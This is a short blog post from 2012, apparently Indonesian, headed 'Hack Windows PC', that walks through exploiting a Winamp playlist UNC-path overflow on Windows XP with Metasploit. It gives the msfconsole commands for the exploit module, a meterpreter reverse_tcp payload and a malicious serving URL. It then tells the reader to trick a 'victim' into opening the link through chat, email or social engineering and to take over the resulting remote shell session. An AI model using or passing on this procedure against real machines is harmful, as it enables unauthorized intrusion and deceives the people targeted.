Warung Online
Headlines News :
mas template
Home » , » Hack Windows PC with Winamp Playlist UNC Path Computer Name Overflow

Hack Windows PC with Winamp Playlist UNC Path Computer Name Overflow

Written By Trik Cari Duit on Jumat, 25 Mei 2012 | 16.38

This module exploits vulnerability in the Winamp media player. This flaw is triggered when a audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12.

Exploit Targets
Winamp 5.12
Windows XP SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/winamp_playlist_unc

Msf exploit (winamp_playlist_unc)>set payload windows/meterpreter/reverse_tcp
Msf exploit (winamp_playlist_unc)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (winamp_playlist_unc)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (winamp_playlist_unc)>set uripath winamp (The Url to use for this exploit)
Msf exploit (winamp_playlist_unc)>exploit  


Now an URL you should give to your victim http://192.168.1.2:8080/winamp


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger